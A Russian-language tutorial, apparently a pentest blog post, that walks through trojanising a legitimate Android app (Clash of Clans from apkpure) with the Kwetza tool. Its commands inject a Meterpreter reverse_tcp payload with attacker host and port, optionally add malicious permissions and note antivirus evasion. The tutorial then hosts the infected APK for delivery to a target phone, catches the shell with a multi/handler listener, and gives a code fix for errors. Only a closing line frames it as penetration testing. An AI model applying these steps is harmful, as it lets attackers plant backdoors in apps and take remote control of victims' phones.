Заражение законных приложений Android — это отличный способ увидеть, как устройства, пользователи и антивирус реагируют на эти типы атак, и служит постоянным напоминанием о том, насколько мобильное пространство соблазнительно для злоумышленников.

Заражение Android-приложений — отличный способ увидеть, как вредоносные действия в дикой природе, такие как вредоносное ПО и розыгрыши, влияют на людей. Это не только дает вам доступ к компьютерам пользователей, но также позволяет вам наблюдать, как устройства, пользователи и антивирусное программное обеспечение реагируют на эти обстоятельства.

В этой статье мы покажем вам, как заразить (или создать троян) любое Android-приложение с помощью инструмента Kwetza.

Kwetza — это инструмент, который позволяет вам заразить текущее Android-приложение полезной нагрузкой Meterpreter. Kwetza заражает существующее Android-приложение пользовательскими или стандартными форматами полезной нагрузки, чтобы сохранить стратегическую дистанцию ​​от обнаружения антивирусом. Kwetza позволяет вам заражать приложения Android, используя авторизацию целевого приложения по умолчанию, или вводить дополнительные согласия для повышения дополнительной полезности.

Чтобы загрузить этот инструмент, посетите следующую веб-страницу: https://github.com/sensepost/kwetza.

Скопируйте ссылку для загрузки и используйте команду «git clone», чтобы загрузить kwetza в каталог «/opt».

Пример: (root@kali:/opt# git clone https://github.com/sensepost/kwetza.git).

Затем перейдите на веб-страницу «https://apkpure.com/» и загрузите любое приложение, которое хотите заразить бэкдором.

Затем переместите это приложение в каталог /kwetza.

Пример: (root@kali:~/Downloads# mv Clash-of-Clans.apk /opt/kwetza/).

Kwetza написан на Python и требует "BeautifulSoup4", который можно установить с помощью команды "pip".

Пример: (root@kali:/opt/kwetza# pip install beautifulsoup4).

Использование этого инструмента выглядит следующим образом:

«python kwetza.py [apk].apk https/tcp LHOST LPORT yes/no customClass»

[apk]= имя APK-файла, который вы хотите заразить.

https/tcp = выберите соединение HTTPS или TCP (HTTPS рекомендуется для стабильного соединения)

LHOST = IP-адрес вашего слушателя (IP-адрес злоумышленника).

LPORT = порт вашего прослушивателя.

yes = включите "yes", чтобы внедрить в приложение новые вредоносные разрешения, "no", чтобы использовать разрешения приложения по умолчанию.

customClass = Укажите здесь пользовательское действие, если вы хотите, чтобы Kwetza внедрил в это действие.

Пример: (root@kali:/opt/kwetza# python kwetza.py Clash-of-Clans.apk 10.10.10.4 8080 no).

Если вы хотите подписать зараженное приложение с помощью собственной аутентификации, создайте другое хранилище ключей в папке “payload” и переименуйте его в текущее хранилище ключей или измените ссылку в “kwetza.py”. .” Пароль для хранилища ключей по умолчанию: “password”. Введите парольную фразу и нажмите “Enter”, чтобы начать процесс.

Когда все будет сделано и завершено, зараженный APK-файл будет сохранен в папке /opt/kwetza/Clash-of-Clans/dist/Clash-of-Clans.apk. Переместите зараженное приложение на веб-сервер для бесперебойной доставки на наш целевой телефон.

Пример: (root@kali:/opt/kwetza/Clash-of-Clans/dist# mv Clash-of-Clans.apk /var/www/ html/Hello_World/).

Перед выполнением нашего вредоносного APK-файла на целевом устройстве Android нам нужно запустить прослушиватель. В этом примере в качестве эксплойта мы будем использовать мультиобработчик и для полезной нагрузки «android/meterpreter/reverse_tcp». Установите «LHOST» и "LPORT", затем введите "exploit", чтобы начать прослушивание входящих подключений.

После того, как вредоносный APK-файл загружен и установлен, он запустит все законные пакеты приложений, но в фоновом режиме устройство отправит обратное соединение оболочки на компьютер злоумышленника.

Как вы можете видеть на изображении ниже, нам удалось получить активную сессию, поэтому мы можем взаимодействовать с ней и использовать ее дальше.

Примечание. Если вы столкнулись с ошибкой "Панель запуска не найдена", воспользуйтесь следующим методом устранения неполадок.

Откройте скрипт kwetza.py с помощью любого инструмента для редактирования файлов и найдите раздел, указанный ниже:

— — — — — — — — — — — — — — — — — — — — — — — — — —

«#ТЕПЕРЬ НАМ НУЖНО ДЕКОМПИЛИРОВАТЬ ПРИЛОЖЕНИЕ
command = [“apktool”, “d”, “-f”, “-r”,
““+cwd+”/ "+sys.argv[1]]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()[0]"

— — — — — — — — — — — — — — — — — — — — — — — — — —

И удалите параметры option “-f”и “-r”, как показано на снимке экрана.

Затем удалите папку, созданную для зараженного приложения. В данном случае мы использовали Clash-of-Clans.apk, поэтому kwetza создал папку Clash_of_Clans. Нам нужно удалить эту папку, чтобы не было ошибок при повторном запуске kwetza.

Пример: (root@kali:/opt/kwetza# rm -rf Clash_of_Clans).

Наконец, запустите kwetza с помощью тех же команд, но в конце добавьте параметр AssistActivity.

Пример: (root@kali:/opt/kwetza# python kwetza.py Clash-of-Clans.apk 10.10.10.4 8080 без AssistActivity).

Kwetza — это инструмент для тестирования на проникновение и оценки безопасности. Он заражает существующее Android-приложение одним из двух шаблонов полезной нагрузки: пользовательским или стандартным. Это делается для предотвращения обнаружения антивирусным программным обеспечением. Для достижения дополнительных функций инструмент использует разрешения целевого приложения по умолчанию или вводит дополнительные разрешения.

Заражение законных приложений Android — это отличный способ увидеть, как устройства, пользователи и антивирус реагируют на эти типы атак, и служит постоянным напоминанием о том, насколько мобильное пространство соблазнительно для злоумышленников.